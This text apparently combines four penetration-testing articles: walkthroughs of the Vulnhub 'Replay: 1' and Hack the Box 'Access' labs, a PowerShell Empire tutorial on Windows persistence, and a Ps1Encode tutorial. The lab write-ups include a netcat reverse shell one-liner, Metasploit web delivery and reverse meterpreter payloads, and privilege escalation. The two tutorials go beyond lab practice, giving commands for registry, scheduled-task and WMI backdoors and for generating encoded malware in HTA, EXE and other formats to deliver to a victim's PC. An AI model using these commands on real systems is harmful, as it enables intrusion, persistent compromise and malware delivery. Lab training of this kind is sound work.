Replay: 1: Vulnhub Lab Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “Replay: 1”. The credit for making this VM machine goes to “c0rruptedb1t” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Flags: There is one flag (flag.txt).

Penetrating Methodology:
·        IP Discovery using netdiscover
·        Network scanning (Nmap)
·        Surfing HTTPS service port (80)
·        Enumerating password from Source code.
·        Enumerating robots.txt and finding zip file
·        Unzipping zip file
·        Enumerating password from binary file
·        Enumerating the hard coded command
·        Editing the hardcoded command
·        Getting a reverse shell
·        Enumerating password for user
·        Elevate Privileges to get root
·        Getting Flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.37

Our next step is to scan our target with nmap.

nmap -p- -A 192.168.1.37

The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 1337(Unknown)

We find that port 80 is running http, so we open the IP in our browser.

We take a look at the source code of web page and at the top of the source code we find a string inside a comment. We are not able to do anything with it, so we save it for later.

As nmap scan shows us that there is one entry inside robots.txt. We open robots.txt and find an entry called “/bob_db.zip”.

We open the link and download the zip file from the web server. After downloading the file, we extract it and find 64-bit ELF file and a text file. We take a look at the content of the text file and don’t find anything of use.

When we run the application “client.bin”, it asks for an IP address and a password.

As we have no clue for the password, we check the strings inside the application and there we find a hint for the password. Inside the application we find the second half of the password. Now earlier inside the web page, we found a strange string that might be the first half of the password.

Password: qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul

We joined the string and use it as password for the application. After giving the password, we successfully able to login, and find that we can run commands. But when we type a command we get an error stating that we are sending unauthorized packets and the connection gets closed.

Now when we take a closer look at the application we find that the command “;whoami” is hardcoded in the application.

We try to edit the application and change “;whoami” command to something else and find that the size of string inside the application should remain the same and the command should always start with a semi-colon. So we changed the “;whoami” to “;uname -a” keeping the number of characters inside the application the same by replacing existing characters inside the application.

Now when we run the application and give the password we are successfully able to execute our command.

Now we replace the entire string with our netcat reverse shell one liner and used extra characters to keep the size of the application the same.

nc -e /bin/bash 192.168.1.25 4444;ls;ls;ls;ls;ls;ls;ls;

Now we run the application and give the correct the password.

We setup our listener and are successfully able to get a reverse shell. After getting a reverse shell we spawn a TTY shell using python.

nc -lvp 4444

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Enumerating through the directories inside “~/Documents/.ftp” we find a file called “users.passwd”. We open it and find the password for user “bob”. Now we check the sudoers list and find that we can run all commands as root user.

sudo -l

As we have the password for user bob, we spawn a shell as root user. We go to “/” directory and find a file called “flag.txt”. We take a look at the content of the file and find the congratulatory flag.

sudo -i

cd /

cat flag.txt

Hack the Box Access: Walkthrough

Today we are going to solve another CTF challenge “Access”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.98.

Penetrating Methodologies:

·         Network scanning (nmap).

·         Logging in FTP using Anonymous Login.

·         Using strings to read contents of .mdb file.

·         Unzipping Zip file using 7z.

·         Using readpst to read the contents of .pst file.

·         Finding Login Credentials

·         Logging into Telnet.

·         Finding first flag user.txt

·         Using webdelivery module to create powershell code.

·         Getting Meterpreter.

·         Using exploit suggester of Metasploit.

·         Getting Root Access.

·         Changing Administrator password using net user.

·         Reading Our Final flag root.txt

Walkthrough

Let’s start off with scanning the network to find our target.

nmap -p- -A 10.10.10.98

First thing that got our attention is that we have anonymous access to the ftp server. Let’s login and see what we find.

After successfully logging into FTP server, we have enumerated directories from where we have downloaded two files Access Control.zip and backup.mdb . They might come in handy later on.

ftp 10.10.10.98

When we tried to unzip the zip file found out that it was password protected. So we tried to open the backup.mdb file and found a password to the zip file.

strings backup.mdb | grep access

Once we have obtained the password for the Access Control.zip. Time to unzip it. After unzipping we saw its a .pst which is a Microsoft Exchange Format for mailboxes. Using readpst it converted the file into .mbox format.

7z x Access\ Control.zip

readpst ‘Access Control.pst’

Let’s read the contents of the Access Control.mbox.

less ‘Access Control.mbox’

After reading the contents, we saw that useful credentials that surely going to help us to move ahead.

Username- security

Password- 4Cc3ssC0ntr0ller

Let’s login into telnet using our new credentials. After enumerating through directories, we have found our first flag.

telnet 10.10.10.98

dir

cd Desktop

type user.txt

Let’s create a shell code generated via the web delivery module of Metasploit.

use exploit/multi/script/web_delivery

set target 2

set payload windows/x64/meterpreter/reverse_tcp

set lhost 10.10.14.6

exploit

Now we will execute the PowerShell code generated via the web delivery module.

We have successfully got the meterpreter. Moving forward.

getuid

getsystem

sysinfo

After that we have used exploit suggester which has gave us all the possible exploits for the operating system of the Victims system.

use post/multi/recon/local_exploit_suggester

set sessions 1

exploit

Using the exploit ms16_014_wmirecv_notif of metasploit.

use exploit/windows/local/ms16_014_wmi_recv_notif

set lhost 10.10.14.6

set session 1

set lport 1234

exploit

oh yeah! We have got the root access.

whoami

We looked for our Final Flag but couldn’t find it. Instead we changed the password for Administrator because we can used it to login via telnet.

net user

net user Administrator Ignite@123

Here we successfully logged in via Telnet and found our final flag.

telnet 10.10.10.98

login: administrator

password: Ignite@123

cd Desktop

type root.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Windows Persistence with PowerShell Empire

This is the third article in our empire series, through this we will learn elevated persistence methods. Its trigger method is pretty organised with storage options contained within each module.

In Empire, the elevated persistence modules use trigger method and different storage options are required in different modules.  All of these persistence modules are based on PowerSploit’s persistence. As these are elevated persistence, it requires you to have admin access to work as intended. They have different setting options in them including cleanup, etc., for instance, CleanUp option will set delete your backdoor and set the machine back to its original state.

The registry methods in the gaining the persistence are one of the oldest methods which uses the HKLM version to trigger our payload into the system. Couple of persistence that we will show in our article will have schtasks as an option. This option makes the module a bit trickier as it sets the payload to be triggered on either DailyTime i.e. any given time or using OnLogon option which triggers the payload user is logs on. The Onlogon option does not display a prompt and runs as SYSTEM.

The WMI module is mostly the go to persistence method. It lets you add a permanent WMI payload at either DailyTime (i.e. at a certain time) or at startup. This module too runs as SYSTEM and it doesn’t not depend on user being logged in.

The modules of persistence that we our going to show in our article are as follows :

·         Persistence/elevated/registry

·         Persistence/elevated/schtask

·         Persistence/elevated/wmi

Firstly, we have to have an elevated session (session with admin rights) through empire. To know how to get the said session click here. As you can see in the image high integrity is set to 1 that means we have admin privileges. Now, we will use the first persistence module listed above and for this use the following commands :

usemodule persistence/ekevated/registry*

set listener http

execute

Once the above module is executed and when the target machine is restarted, you will again automatically have your session. As shown in the image below :

Our next module is persistence/elevated/schtasks, this is a bit different from the previous one as in this we can set a certain time on which we want to gain our session. Again after having a session with administrator privileges, we will use the following set of commands to activate the said persistence module :

usemodule persistence/elevated/schtasks*

set OnLogon True

set listener http

execute

Due to OnLogon option, you session will return to you once the user logs on to their system, refer the following image for the same :

Lastly, we will use persistence/elevated/wmi module and to use it, type the following set of commands :

usemodue persistence/elevated/wmi

set Listener http

set AtStartup True

execute

As we have set the startup option true, you will have your session as soon as the target machine starts up just like its shown in the image below :

Generate Metasploit Payload with Ps1encode

Generate Metasploit Payload with Ps1encode

In this article, we will learn Ps1Encode tool and how to use it by generating malwares in different file formats such as HTA, EXE, etc.

Introduction

The working code of Ps1Encode is developed by Matt Greaber, Dev Kennedy with few others. Ps1Encode is used to generate a malicious payload in order to generate a meterpreter session. While generating the payload, it will encode it too. It is a different way to bypass Whitelisting and security on the target system. It's developed in ruby and allows us to create series of payload which are based on Metasploit but can be prepared in any format we desire. The final aim is to get a PowerShell running and execute our payload through it.

There are various formats for our malwares that are supported by Ps1Encode are the following :

      raw (encoded payload only - no powershell run options)
·        cmd (for use with bat files)
·        vba (for use with macro trojan docs)
·        vbs (for use with vbs scripts)
·        war (tomcat)
·        exe (executable) requires MinGW - x86_64-w64-mingw32-gcc [apt-get install mingw-w64]
·        java (for use with malicious java applets)
·        js (javascript)
·        js-rd32 (javascript called by rundll32.exe)
·        php (for use with php pages)
·        hta (HTML applications)
·        cfm (for use with Adobe ColdFusion)
·        aspx (for use with Microsoft ASP.NET)
·        lnk (windows shortcut - requires a webserver to stage the payload)
·        sct (COM scriptlet - requires a webserver to stage the payload)

You can download Ps1Encode from here using git clone command as shown in the image below :

Once it’s downloaded, let’s use the help command to check the syntax that we have to use. Use the following set of commands for that :

cd ps1encode/

ls

./ps1encode.rc -h

Following are the syntaxes that we can use :

-i : defines local host IP

-p : defines local host port value

-a : defines payload value

-t : defines output format

Now, we will generate a malicious raw file using the following command :

./ps1encode.rb -I 192.168.1.07 -p 8000 -a windows/meterpreter/reverse_https

Copy the code generated using the above command in the file with the extension.bat. and the share it by using python server. You can start the server using the following command :

python -m SimpleHTTPServer 80

Simultaneously, start the multi handler to have a session with the following set of commands :

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 192.168.1.107

lport 8000

exploit

Once the file is executed in the victims’ PC, you will have your session as shown in the image above. Now we will generate our malware in the form of HTA file. Use the following command to generate the HTA file :

./ps1encode.rb -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t hta

Following script will be created due to the above command, send this file to the victim’s PC using python server like before.

Simultaneously, start the multi handler to have a session with the following set of commands :

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 192.168.1.107

lport 8000

exploit

Once the file is executed in the victims’ PC, you will have your session as shown in the image above. Now we will try and generate an EXE file with the following :

./ps1encode -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t exe

Send this file to the victim’s PC using python server like before a shown in the image above. Simultaneously, start the multi handler to have a session with the following set of commands :

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 192.168.1.107

lport 8000

exploit

This way, you can use Ps1Encode to generate files in any format. As you can see, its pretty simple and convenient along with being user-friendly. Possibilities with Ps1Encode are endless.